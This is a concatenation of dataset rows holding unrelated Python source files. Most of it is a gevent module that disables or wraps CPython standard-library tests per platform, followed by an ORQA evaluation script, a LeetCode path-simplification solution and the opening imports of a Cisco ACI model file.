return with_orig
@contextlib.contextmanager
def _gc_at_end():
try:
yield
finally:
import gc
gc.collect()
gc.collect()
@contextlib.contextmanager
def _flaky_socket_timeout():
import socket
try:
yield
except socket.timeout:
flaky.reraiseFlakyTestTimeout()
# Map from FQN to a context manager that will be wrapped around
# that test.
wrapped_tests = {
}
class _PatchedTest(object):
def __init__(self, test_fqn):
self._patcher = wrapped_tests[test_fqn]
def __call__(self, orig_test_fn):
@functools.wraps(orig_test_fn)
def test(*args, **kwargs):
with self._patcher():
return orig_test_fn(*args, **kwargs)
return test
if sys.version_info[:3] <= (2, 7, 11):
disabled_tests += [
# These were added/fixed in 2.7.12+
'test_ssl.ThreadedTests.test__https_verify_certificates',
'test_ssl.ThreadedTests.test__https_verify_envvar',
]
if OSX:
disabled_tests += [
'test_subprocess.POSIXProcessTestCase.test_run_abort',
# causes Mac OS X to show "Python crashes" dialog box which is annoying
]
if WIN:
disabled_tests += [
# Issue with Unix vs DOS newlines in the file vs from the server
'test_ssl.ThreadedTests.test_socketserver',
# On appveyor, this sometimes produces 'A non-blocking socket
# operation could not be completed immediately', followed by
# 'No connection could be made because the target machine
# actively refused it'
'test_socket.NonBlockingTCPTests.testAccept',
]
# These are a problem on 3.5; on 3.6+ they wind up getting (accidentally) disabled.
wrapped_tests.update({
'test_socket.SendfileUsingSendTest.testWithTimeout': _flaky_socket_timeout,
'test_socket.SendfileUsingSendTest.testOffset': _flaky_socket_timeout,
'test_socket.SendfileUsingSendTest.testRegularFile': _flaky_socket_timeout,
'test_socket.SendfileUsingSendTest.testCount': _flaky_socket_timeout,
})
if PYPY:
disabled_tests += [
# Does not exist in the CPython test suite, tests for a specific bug
# in PyPy's forking. Only runs on linux and is specific to the PyPy
# implementation of subprocess (possibly explains the extra parameter to
# _execut_child)
'test_subprocess.ProcessTestCase.test_failed_child_execute_fd_leak',
# On some platforms, this returns "zlib_compression", but the test is looking for
# "ZLIB"
'test_ssl.ThreadedTests.test_compression',
# These are flaxy, apparently a race condition? Began with PyPy 2.7-7 and 3.6-7
'test_asyncore.TestAPI_UsePoll.test_handle_error',
'test_asyncore.TestAPI_UsePoll.test_handle_read',
]
if WIN:
disabled_tests += [
# Starting in 7.3.1 on Windows, this stopped raising ValueError; it appears to
# be a bug in PyPy.
'test_signal.WakeupFDTests.test_invalid_fd',
# Likewise for 7.3.1. See the comments for PY35
'test_socket.GeneralModuleTests.test_sock_ioctl',
]
if PY36:
disabled_tests += [
# These are flaky, beginning in 3.6-alpha 7.0, not finding some flag
# set, apparently a race condition
'test_asyncore.TestAPI_UveIPv6Poll.test_handle_accept',
'test_asyncore.TestAPI_UveIPv6Poll.test_handle_accepted',
'test_asyncore.TestAPI_UveIPv6Poll.test_handle_close',
'test_asyncore.TestAPI_UveIPv6Poll.test_handle_write',
'test_asyncore.TestAPI_UseIPV6Select.test_handle_read',
# These are reporting 'ssl has no attribute ...'
# This could just be an OSX thing
'test_ssl.ContextTests.test__create_stdlib_context',
'test_ssl.ContextTests.test_create_default_context',
'test_ssl.ContextTests.test_get_ciphers',
'test_ssl.ContextTests.test_options',
'test_ssl.ContextTests.test_constants',
# These tend to hang for some reason, probably not properly
# closed sockets.
'test_socketserver.SocketServerTest.test_write',
# This uses ctypes to do funky things including using ptrace,
# it hangs
'test_subprocess.ProcessTestcase.test_child_terminated_in_stopped_state',
# Certificate errors; need updated test
'test_urllib2_localnet.TestUrlopen.test_https',
]
# Generic Python 3
if PY3:
disabled_tests += [
# Triggers the crash reporter
'test_threading.SubinterpThreadingTests.test_daemon_threads_fatal_error',
# Relies on an implementation detail, Thread._tstate_lock
'test_threading.ThreadTests.test_tstate_lock',
# Relies on an implementation detail (reprs); we have our own version
'test_threading.ThreadTests.test_various_ops',
'test_threading.ThreadTests.test_various_ops_large_stack',
'test_threading.ThreadTests.test_various_ops_small_stack',
# Relies on Event having a _cond and an _reset_internal_locks()
# XXX: These are commented out in the source code of test_threading because
# this doesn't work.
# 'lock_tests.EventTests.test_reset_internal_locks',
# Python bug 13502. We may or may not suffer from this as its
# basically a timing race condition.
# XXX Same as above
# 'lock_tests.EventTests.test_set_and_clear',
# These tests want to assert on the type of the class that implements
# `Popen.stdin`; we use a FileObject, but they expect different subclasses
# from the `io` module
'test_subprocess.ProcessTestCase.test_io_buffered_by_default',
'test_subprocess.ProcessTestCase.test_io_unbuffered_works',
# 3.3 exposed the `endtime` argument to wait accidentally.
# It is documented as deprecated and not to be used since 3.4
# This test in 3.6.3 wants to use it though, and we don't have it.
'test_subprocess.ProcessTestCase.test_wait_endtime',
# These all want to inspect the string value of an exception raised
# by the exec() call in the child. The _posixsubprocess module arranges
# for better exception handling and printing than we do.
'test_subprocess.POSIXProcessTestCase.test_exception_bad_args_0',
'test_subprocess.POSIXProcessTestCase.test_exception_bad_executable',
'test_subprocess.POSIXProcessTestCase.test_exception_cwd',
# Relies on a 'fork_exec' attribute that we don't provide
'test_subprocess.POSIXProcessTestCase.test_exception_errpipe_bad_data',
'test_subprocess.POSIXProcessTestCase.test_exception_errpipe_normal',
# Python 3 fixed a bug if the stdio file descriptors were closed;
# we still have that bug
'test_subprocess.POSIXProcessTestCase.test_small_errpipe_write_fd',
# Relies on implementation details (some of these tests were added in 3.4,
# but PyPy3 is also shipping them.)
'test_socket.GeneralModuleTests.test_SocketType_is_socketobject',
'test_socket.GeneralModuleTests.test_dealloc_warn',
'test_socket.GeneralModuleTests.test_repr',
'test_socket.GeneralModuleTests.test_str_for_enums',
'test_socket.GeneralModuleTests.testGetaddrinfo',
]
if TRAVIS:
disabled_tests += [
# test_cwd_with_relative_executable tends to fail
# on Travis...it looks like the test processes are stepping
# on each other and messing up their temp directories. We tend to get things like
# saved_dir = os.getcwd()
# FileNotFoundError: [Errno 2] No such file or directory
'test_subprocess.ProcessTestCase.test_cwd_with_relative_arg',
'test_subprocess.ProcessTestCaseNoPoll.test_cwd_with_relative_arg',
'test_subprocess.ProcessTestCase.test_cwd_with_relative_executable',
# In 3.7 and 3.8 on Travis CI, this appears to take the full 3 seconds.
# Can't reproduce it locally. We have our own copy of this that takes
# timing on CI into account.
'test_subprocess.RunFuncTestCase.test_run_with_shell_timeout_and_capture_output',
]
disabled_tests += [
# XXX: BUG: We simply don't handle this correctly. On CPython,
# we wind up raising a BlockingIOError and then
# BrokenPipeError and then some random TypeErrors, all on the
# server. CPython 3.5 goes directly to socket.send() (via
# socket.makefile), whereas CPython 3.6 uses socket.sendall().
# On PyPy, the behaviour is much worse: we hang indefinitely, perhaps exposing a problem
# with our signal handling.
# In actuality, though, this test doesn't fully test the EINTR it expects
# to under gevent (because if its EWOULDBLOCK retry behaviour.)
# Instead, the failures were all due to `pthread_kill` trying to send a signal
# to a greenlet instead of a real thread. The solution is to deliver the signal
# to the real thread by letting it get the correct ID, and we previously
# used make_run_with_original to make it do that.
#
# But now that we have disabled our wrappers around Thread.join() in favor
# of the original implementation, that causes problems:
# background.join() thinks that it is the current thread, and won't let it
# be joined.
'test_wsgiref.IntegrationTests.test_interrupted_write',
]
# PyPy3 3.5.5 v5.8-beta
if PYPY3:
disabled_tests += [
# This raises 'RuntimeError: reentrant call' when exiting the
# process tries to close the stdout stream; no other platform does this.
# Seen in both 3.3 and 3.5 (5.7 and 5.8)
'test_signal.SiginterruptTest.test_siginterrupt_off',
]
if PYPY and PY3:
disabled_tests += [
# This fails to close all the FDs, at least on CI. On OS X, many of the
# POSIXProcessTestCase fd tests have issues.
'test_subprocess.POSIXProcessTestCase.test_close_fds_when_max_fd_is_lowered',
# This has the wrong constants in 5.8 (but worked in 5.7), at least on
# OS X. It finds "zlib compression" but expects "ZLIB".
'test_ssl.ThreadedTests.test_compression',
# The below are new with 5.10.1
# This gets an EOF in violation of protocol; again, even without gevent
# (at least on OS X; it's less consistent about that on travis)
'test_ssl.NetworkedBIOTests.test_handshake',
# This passes various "invalid" strings and expects a ValueError. not sure why
# we don't see errors on CPython.
'test_subprocess.ProcessTestCase.test_invalid_env',
]
if OSX:
disabled_tests += [
# These all fail with "invalid_literal for int() with base 10: b''"
'test_subprocess.POSIXProcessTestCase.test_close_fds',
'test_subprocess.POSIXProcessTestCase.test_close_fds_after_preexec',
'test_subprocess.POSIXProcessTestCase.test_pass_fds',
'test_subprocess.POSIXProcessTestCase.test_pass_fds_inheritable',
'test_subprocess.POSIXProcessTestCase.test_pipe_cloexec',
# The below are new with 5.10.1
# These fail with 'OSError: received malformed or improperly truncated ancillary data'
'test_socket.RecvmsgSCMRightsStreamTest.testCmsgTruncLen0',
'test_socket.RecvmsgSCMRightsStreamTest.testCmsgTruncLen0Plus1',
'test_socket.RecvmsgSCMRightsStreamTest.testCmsgTruncLen1',
'test_socket.RecvmsgSCMRightsStreamTest.testCmsgTruncLen2Minus1',
# Using the provided High Sierra binary, these fail with
# 'ValueError: invalid protocol version _SSLMethod.PROTOCOL_SSLv3'.
# gevent code isn't involved and running them unpatched has the same issue.
'test_ssl.ContextTests.test_constructor',
'test_ssl.ContextTests.test_protocol',
'test_ssl.ContextTests.test_session_stats',
'test_ssl.ThreadedTests.test_echo',
'test_ssl.ThreadedTests.test_protocol_sslv23',
'test_ssl.ThreadedTests.test_protocol_sslv3',
'test_ssl.ThreadedTests.test_protocol_tlsv1',
'test_ssl.ThreadedTests.test_protocol_tlsv1_1',
# Similar, they fail without monkey-patching.
'test_ssl.TestPostHandshakeAuth.test_pha_no_pha_client',
'test_ssl.TestPostHandshakeAuth.test_pha_optional',
'test_ssl.TestPostHandshakeAuth.test_pha_required',
# This gets None instead of http1.1, even without gevent
'test_ssl.ThreadedTests.test_npn_protocols',
# This fails to decode a filename even without gevent,
# at least on High Sierra. Newer versions of the tests actually skip this.
'test_httpservers.SimpleHTTPServerTestCase.test_undecodable_filename',
]
disabled_tests += [
# This seems to be a buffering issue? Something isn't
# getting flushed. (The output is wrong). Under PyPy3 5.7,
# I couldn't reproduce locally in Ubuntu 16 in a VM
# or a laptop with OS X. Under 5.8.0, I can reproduce it, but only
# when run by the testrunner, not when run manually on the command line,
# so something is changing in stdout buffering in those situations.
'test_threading.ThreadJoinOnShutdown.test_2_join_in_forked_process',
'test_threading.ThreadJoinOnShutdown.test_1_join_in_forked_process',
]
if TRAVIS:
disabled_tests += [
# Likewise, but I haven't produced it locally.
'test_threading.ThreadJoinOnShutdown.test_1_join_on_shutdown',
]
if PYPY:
wrapped_tests.update({
# XXX: gevent: The error that was raised by that last call
# left a socket open on the server or client. The server gets
# to http/server.py(390)handle_one_request and blocks on
# self.rfile.readline which apparently is where the SSL
# handshake is done. That results in the exception being
# raised on the client above, but apparently *not* on the
# server. Consequently it sits trying to read from that
# socket. On CPython, when the client socket goes out of scope
# it is closed and the server raises an exception, closing the
# socket. On PyPy, we need a GC cycle for that to happen.
# Without the socket being closed and exception being raised,
# the server cannot be stopped (it runs each request in the
# same thread that would notice it had been stopped), and so
# the cleanup method added by start_https_server to stop the
# server blocks "forever".
# This is an important test, so rather than skip it in patched_tests_setup,
# we do the gc before we return.
'test_urllib2_localnet.TestUrlopen.test_https_with_cafile': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_command': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_handler': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_head_keep_alive': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_head_via_send_error': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_header_close': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_internal_key_error': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_request_line_trimming': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_return_custom_status': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_return_header_keep_alive': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_send_blank': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_send_error': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_bogus': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_digits': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_invalid': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_none': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_version_none_get': _gc_at_end,
'test_httpservers.BaseHTTPServerTestCase.test_get': _gc_at_end,
'test_httpservers.SimpleHTTPServerTestCase.test_get': _gc_at_end,
'test_httpservers.SimpleHTTPServerTestCase.test_head': _gc_at_end,
'test_httpservers.SimpleHTTPServerTestCase.test_invalid_requests': _gc_at_end,
'test_httpservers.SimpleHTTPServerTestCase.test_path_without_leading_slash': _gc_at_end,
'test_httpservers.CGIHTTPServerTestCase.test_invaliduri': _gc_at_end,
'test_httpservers.CGIHTTPServerTestCase.test_issue19435': _gc_at_end,
'test_httplib.TunnelTests.test_connect': _gc_at_end,
'test_httplib.SourceAddressTest.testHTTPConnectionSourceAddress': _gc_at_end,
# Unclear
'test_urllib2_localnet.ProxyAuthTests.test_proxy_with_bad_password_raises_httperror': _gc_at_end,
'test_urllib2_localnet.ProxyAuthTests.test_proxy_with_no_password_raises_httperror': _gc_at_end,
})
if PY35:
disabled_tests += [
'test_subprocess.ProcessTestCase.test_threadsafe_wait',
# XXX: It seems that threading.Timer is not being greened properly, possibly
# due to a similar issue to what gevent.threading documents for normal threads.
# In any event, this test hangs forever
'test_subprocess.POSIXProcessTestCase.test_preexec_errpipe_does_not_double_close_pipes',
# Subclasses Popen, and overrides _execute_child. Expects things to be done
# in a particular order in an exception case, but we don't follow that
# exact order
'test_selectors.PollSelectorTestCase.test_above_fd_setsize',
# This test attempts to open many many file descriptors and
# poll on them, expecting them all to be ready at once. But
# libev limits the number of events it will return at once. Specifically,
# on linux with epoll, it returns a max of 64 (ev_epoll.c).
# XXX: Hangs (Linux only)
'test_socket.NonBlockingTCPTests.testInitNonBlocking',
# We don't handle the Linux-only SOCK_NONBLOCK option
'test_socket.NonblockConstantTest.test_SOCK_NONBLOCK',
# Tries to use multiprocessing which doesn't quite work in
# monkey_test module (Windows only)
'test_socket.TestSocketSharing.testShare',
# Windows-only: Sockets have a 'ioctl' method in Python 3
# implemented in the C code. This test tries to check
# for the presence of the method in the class, which we don't
# have because we don't inherit the C implementation. But
# it should be found at runtime.
'test_socket.GeneralModuleTests.test_sock_ioctl',
# XXX This fails for an unknown reason
'test_httplib.HeaderTests.test_parse_all_octets',
]
if OSX:
disabled_tests += [
# These raise "OSError: 12 Cannot allocate memory" on both
# patched and unpatched runs
'test_socket.RecvmsgSCMRightsStreamTest.testFDPassEmpty',
]
if TRAVIS:
# This has been seen to produce "Inconsistency detected by
# ld.so: dl-open.c: 231: dl_open_worker: Assertion
# `_dl_debug_initialize (0, args->nsid)->r_state ==
# RT_CONSISTENT' failed!" and fail.
disabled_tests += [
'test_threading.ThreadTests.test_is_alive_after_fork',
]
if TRAVIS:
disabled_tests += [
'test_subprocess.ProcessTestCase.test_double_close_on_error',
# This test is racy or OS-dependent. It passes locally (sufficiently fast machine)
# but fails under Travis
]
if PY35:
disabled_tests += [
# XXX: Hangs
'test_ssl.ThreadedTests.test_nonblocking_send',
'test_ssl.ThreadedTests.test_socketserver',
# Uses direct sendfile, doesn't properly check for it being enabled
'test_socket.GeneralModuleTests.test__sendfile_use_sendfile',
# Relies on the regex of the repr having the locked state (TODO: it'd be nice if
# we did that).
# XXX: These are commented out in the source code of test_threading because
# this doesn't work.
# 'lock_tests.LockTests.lest_locked_repr',
# 'lock_tests.LockTests.lest_repr',
# This test opens a socket, creates a new socket with the same fileno,
# closes the original socket (and hence fileno) and then
# expects that the calling setblocking() on the duplicate socket
# will raise an error. Our implementation doesn't work that way because
# setblocking() doesn't actually touch the file descriptor.
# That's probably OK because this was a GIL state error in CPython
# see https://github.com/python/cpython/commit/fa22b29960b4e683f4e5d7e308f674df2620473c
'test_socket.TestExceptions.test_setblocking_invalidfd',
]
if ARES:
disabled_tests += [
# These raise different errors or can't resolve
# the IP address correctly
'test_socket.GeneralModuleTests.test_host_resolution',
'test_socket.GeneralModuleTests.test_getnameinfo',
]
if sys.version_info[1] == 5:
disabled_tests += [
# This test tends to time out, but only under 3.5, not under
# 3.6 or 3.7. Seen with both libev and libuv
'test_socket.SendfileUsingSendTest.testWithTimeoutTriggeredSend',
]
if sys.version_info[:3] <= (3, 5, 1):
# Python issue 26499 was fixed in 3.5.2 and these tests were added.
disabled_tests += [
'test_httplib.BasicTest.test_mixed_reads',
'test_httplib.BasicTest.test_read1_bound_content_length',
'test_httplib.BasicTest.test_read1_content_length',
'test_httplib.BasicTest.test_readline_bound_content_length',
'test_httplib.BasicTest.test_readlines_content_length',
]
if PY36:
disabled_tests += [
'test_threading.MiscTestCase.test__all__',
]
# We don't actually implement socket._sendfile_use_sendfile,
# so these tests, which think they're using that and os.sendfile,
# fail.
disabled_tests += [
'test_socket.SendfileUsingSendfileTest.testCount',
'test_socket.SendfileUsingSendfileTest.testCountSmall',
'test_socket.SendfileUsingSendfileTest.testCountWithOffset',
'test_socket.SendfileUsingSendfileTest.testOffset',
'test_socket.SendfileUsingSendfileTest.testRegularFile',
'test_socket.SendfileUsingSendfileTest.testWithTimeout',
'test_socket.SendfileUsingSendfileTest.testEmptyFileSend',
'test_socket.SendfileUsingSendfileTest.testNonBlocking',
'test_socket.SendfileUsingSendfileTest.test_errors',
]
# Ditto
disabled_tests += [
'test_socket.GeneralModuleTests.test__sendfile_use_sendfile',
]
disabled_tests += [
# This test requires Linux >= 4.3. When we were running 'dist:
# trusty' on the 4.4 kernel, it passed (~July 2017). But when
# trusty became the default dist in September 2017 and updated
# the kernel to 4.11.6, it begain failing. It fails on `res =
# op.recv(assoclen + len(plain) + taglen)` (where 'op' is the
# client socket) with 'OSError: [Errno 22] Invalid argument'
# for unknown reasons. This is *after* having successfully
# called `op.sendmsg_afalg`. Post 3.6.0, what we test with,
# the test was changed to require Linux 4.9 and the data was changed,
# so this is not our fault. We should eventually update this when we
# update our 3.6 version.
# See https://bugs.python.org/issue29324
'test_socket.LinuxKernelCryptoAPI.test_aead_aes_gcm',
]
if PY37:
disabled_tests += [
# These want to use the private '_communicate' method, which
# our Popen doesn't have.
'test_subprocess.MiscTests.test_call_keyboardinterrupt_no_kill',
'test_subprocess.MiscTests.test_context_manager_keyboardinterrupt_no_kill',
'test_subprocess.MiscTests.test_run_keyboardinterrupt_no_kill',
# This wants to check that the underlying fileno is blocking,
# but it isn't.
'test_socket.NonBlockingTCPTests.testSetBlocking',
# 3.7b2 made it impossible to instantiate SSLSocket objects
# directly, and this tests for that, but we don't follow that change.
'test_ssl.BasicSocketTests.test_private_init',
# 3.7b2 made a change to this test that on the surface looks incorrect,
# but it passes when they run it and fails when we do. It's not
# clear why.
'test_ssl.ThreadedTests.test_check_hostname_idn',
# These appear to hang, haven't investigated why
'test_ssl.SimpleBackgroundTests.test_get_server_certificate',
# Probably the same as NetworkConnectionNoServer.test_create_connection_timeout
'test_socket.NetworkConnectionNoServer.test_create_connection',
# Internals of the threading module that change.
'test_threading.ThreadTests.test_finalization_shutdown',
'test_threading.ThreadTests.test_shutdown_locks',
# Expects a deprecation warning we don't raise
'test_threading.ThreadTests.test_old_threading_api',
# This tries to use threading.interrupt_main() from a new Thread;
# but of course that's actually the same thread and things don't
# work as expected.
'test_threading.InterruptMainTests.test_interrupt_main_subthread',
'test_threading.InterruptMainTests.test_interrupt_main_noerror',
# TLS1.3 seems flaky
'test_ssl.ThreadedTests.test_wrong_cert_tls13',
]
if sys.version_info < (3, 7, 6):
disabled_tests += [
# Earlier versions parse differently so the newer test breaks
'test_ssl.BasicSocketTests.test_parse_all_sans',
'test_ssl.BasicSocketTests.test_parse_cert_CVE_2013_4238',
]
if APPVEYOR:
disabled_tests += [
]
if PY38:
disabled_tests += [
# This one seems very strict: doesn't want a pathlike
# first argument when shell is true.
'test_subprocess.RunFuncTestCase.test_run_with_pathlike_path',
# This tests for a warning we don't raise.
'test_subprocess.RunFuncTestCase.test_bufsize_equal_one_binary_mode',
# This compares the output of threading.excepthook with
# data constructed in Python. But excepthook is implemented in C
# and can't see the patched threading.get_ident() we use, so the
# output doesn't match.
'test_threading.ExceptHookTests.test_excepthook_thread_None',
]
if sys.version_info < (3, 8, 1):
disabled_tests += [
# Earlier versions parse differently so the newer test breaks
'test_ssl.BasicSocketTests.test_parse_all_sans',
'test_ssl.BasicSocketTests.test_parse_cert_CVE_2013_4238',
]
# if 'signalfd' in os.environ.get('GEVENT_BACKEND', ''):
# # tests that don't interact well with signalfd
# disabled_tests.extend([
# 'test_signal.SiginterruptTest.test_siginterrupt_off',
# 'test_socketserver.SocketServerTest.test_ForkingTCPServer',
# 'test_socketserver.SocketServerTest.test_ForkingUDPServer',
# 'test_socketserver.SocketServerTest.test_ForkingUnixStreamServer'])
# LibreSSL reports OPENSSL_VERSION_INFO (2, 0, 0, 0, 0) regardless of its version,
# so this is known to fail on some distros. We don't want to detect this because we
# don't want to trigger the side-effects of importing ssl prematurely if we will
# be monkey-patching, so we skip this test everywhere. It doesn't do much for us
# anyway.
disabled_tests += [
'test_ssl.BasicSocketTests.test_openssl_version'
]
if OSX:
disabled_tests += [
# This sometimes produces OSError: Errno 40: Message too long
'test_socket.RecvmsgIntoTCPTest.testRecvmsgIntoGenerator',
]
# Now build up the data structure we'll use to actually find disabled tests
# to avoid a linear scan for every file (it seems the list could get quite large)
# (First, freeze the source list to make sure it isn't modified anywhere)
def _build_test_structure(sequence_of_tests):
_disabled_tests = frozenset(sequence_of_tests)
disabled_tests_by_file = collections.defaultdict(set)
for file_case_meth in _disabled_tests:
file_name, _case, _meth = file_case_meth.split('.')
by_file = disabled_tests_by_file[file_name]
by_file.add(file_case_meth)
return disabled_tests_by_file
_disabled_tests_by_file = _build_test_structure(disabled_tests)
_wrapped_tests_by_file = _build_test_structure(wrapped_tests)
def disable_tests_in_source(source, filename):
# Source and filename are both native strings.
if filename.startswith('./'):
# turn "./test_socket.py" (used for auto-complete) into "test_socket.py"
filename = filename[2:]
if filename.endswith('.py'):
filename = filename[:-3]
# XXX ignoring TestCase class name (just using function name).
# Maybe we should do this with the AST, or even after the test is
# imported.
my_disabled_tests = _disabled_tests_by_file.get(filename, ())
my_wrapped_tests = _wrapped_tests_by_file.get(filename, {})
if my_disabled_tests or my_wrapped_tests:
# Insert our imports early in the file.
# If we do it on a def-by-def basis, we can break syntax
# if the function is already decorated
pattern = r'^import .*'
replacement = r'from gevent.testing import patched_tests_setup as _GEVENT_PTS;'
replacement += r'import unittest as _GEVENT_UTS;'
replacement += r'\g<0>'
source, n = re.subn(pattern, replacement, source, 1, re.MULTILINE)
print("Added imports", n)
# Test cases will always be indented some,
# so use [ \t]+. Without indentation, test_main, commonly used as the
# __main__ function at the top level, could get matched. \s matches
# newlines even in MULTILINE mode so it would still match that.
my_disabled_testcases = set()
for test in my_disabled_tests:
testcase = test.split('.')[-1]
my_disabled_testcases.add(testcase)
# def foo_bar(self)
# ->
# @_GEVENT_UTS.skip('Removed by patched_tests_setup')
# def foo_bar(self)
pattern = r"^([ \t]+)def " + testcase
replacement = r"\1@_GEVENT_UTS.skip('Removed by patched_tests_setup: %s')\n" % (test,)
replacement += r"\g<0>"
source, n = re.subn(pattern, replacement, source, 0, re.MULTILINE)
print('Skipped %s (%d)' % (testcase, n), file=sys.stderr)
for test in my_wrapped_tests:
testcase = test.split('.')[-1]
if testcase in my_disabled_testcases:
print("Not wrapping %s because it is skipped" % (test,))
continue
# def foo_bar(self)
# ->
# @_GEVENT_PTS._PatchedTest('file.Case.name')
# def foo_bar(self)
pattern = r"^([ \t]+)def " + testcase
replacement = r"\1@_GEVENT_PTS._PatchedTest('%s')\n" % (test,)
replacement += r"\g<0>"
source, n = re.subn(pattern, replacement, source, 0, re.MULTILINE)
print('Wrapped %s (%d)' % (testcase, n), file=sys.stderr)
return source
| [
"[email protected]"
] | |
5790747bf3bb59cf374317ac2044970705d035fb | 3213373f90f10c60667c26a56d30a9202e1b9ae3 | /language/orqa/predict/orqa_eval.py | 1fe260eb6edd190f0e5df545f0ad78f7fc8a06b0 | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | Mistobaan/language | 59a481b3ff6a7c7beada2361aef7173fbfd355a4 | 394675a831ae45ea434abb50655e7975c68a7121 | refs/heads/master | 2022-11-29T14:10:37.590205 | 2020-08-13T22:28:13 | 2020-08-13T22:31:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,448 | py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""ORQA evaluation."""
import json
import os
from absl import flags
from language.orqa.models import orqa_model
from language.orqa.utils import eval_utils
import six
import tensorflow.compat.v1 as tf
FLAGS = flags.FLAGS
flags.DEFINE_string("model_dir", None, "Model directory.")
flags.DEFINE_string("dataset_path", None, "Data path.")
def main(_):
predictor = orqa_model.get_predictor(FLAGS.model_dir)
example_count = 0
correct_count = 0
predictions_path = os.path.join(FLAGS.model_dir, "predictions.jsonl")
with tf.io.gfile.GFile(predictions_path, "w") as predictions_file:
with tf.io.gfile.GFile(FLAGS.dataset_path) as dataset_file:
for line in dataset_file:
example = json.loads(line)
question = example["question"]
answers = example["answer"]
predictions = predictor(question)
predicted_answer = six.ensure_text(
predictions["answer"], errors="ignore")
is_correct = eval_utils.is_correct(
answers=[six.ensure_text(a) for a in answers],
prediction=predicted_answer,
is_regex=False)
predictions_file.write(
json.dumps(
dict(
question=question,
prediction=predicted_answer,
predicted_context=six.ensure_text(
predictions["orig_block"], errors="ignore"),
correct=is_correct,
answer=answers)))
predictions_file.write("\n")
correct_count += int(is_correct)
example_count += 1
tf.logging.info("Accuracy: %.4f (%d/%d)",
correct_count/float(example_count),
correct_count,
example_count)
if __name__ == "__main__":
tf.disable_v2_behavior()
tf.app.run()
| [
"[email protected]"
] | |
81dbc6da5a67a3c9d1cf4e3e4013b93416329c60 | aef08a7c30c80d24a1ba5708f316153541b841d9 | /Leetcode 0071. Simplify Path.py | 7f9fbb46989a724cd62a68c8396c195fbacddb48 | [] | no_license | Chaoran-sjsu/leetcode | 65b8f9ba44c074f415a25989be13ad94505d925f | 6ff1941ff213a843013100ac7033e2d4f90fbd6a | refs/heads/master | 2023-03-19T02:43:29.022300 | 2020-11-03T02:33:25 | 2020-11-03T02:33:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,539 | py | """
71. Simplify Path
Given an absolute path for a file (Unix-style), simplify it. Or in other words, convert it to the canonical path.
In a UNIX-style file system, a period . refers to the current directory. Furthermore, a double period .. moves the directory up a level.
Note that the returned canonical path must always begin with a slash /, and there must be only a single slash / between two directory names. The last directory name (if it exists) must not end with a trailing /. Also, the canonical path must be the shortest string representing the absolute path.
Example 1:
Input: "/home/"
Output: "/home"
Explanation: Note that there is no trailing slash after the last directory name.
Example 2:
Input: "/../"
Output: "/"
Explanation: Going one level up from the root directory is a no-op, as the root level is the highest level you can go.
Example 3:
Input: "/home//foo/"
Output: "/home/foo"
Explanation: In the canonical path, multiple consecutive slashes are replaced by a single one.
Example 4:
Input: "/a/./b/../../c/"
Output: "/c"
Example 5:
Input: "/a/../../b/../c//.//"
Output: "/c"
Example 6:
Input: "/a//b////c/d//././/.."
Output: "/a/b/c"
"""
class Solution:
def simplifyPath(self, path: str) -> str:
stack = []
for s in path.split("/"):
if len(s) == 0 or s == ".":
continue
elif s == "..":
if len(stack) > 0:
stack.pop()
else:
stack.append(s)
return "/" + "/".join(stack)
| [
"[email protected]"
] | |
631e33fe35bf9b382cc076142b56410f9f925c6f | e60a342f322273d3db5f4ab66f0e1ffffe39de29 | /parts/zodiac/pyramid/tests/pkgs/fixtureapp/views.py | a42b58217f01e42d42c80a658be0d1bc8c543933 | [] | no_license | Xoting/GAExotZodiac | 6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1 | f60b2b77b47f6181752a98399f6724b1cb47ddaf | refs/heads/master | 2021-01-15T21:45:20.494358 | 2014-01-13T15:29:22 | 2014-01-13T15:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | /home/alex/myenv/zodiac/eggs/pyramid-1.4-py2.7.egg/pyramid/tests/pkgs/fixtureapp/views.py | [
"[email protected]"
] | |
40d415f635b35add767833905aef591e6990c7bb | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/bgp/bgprtprefixcounthist1year.py | 71ca4307f2d3906eb50252edabe8f510d7043377 | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,082 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
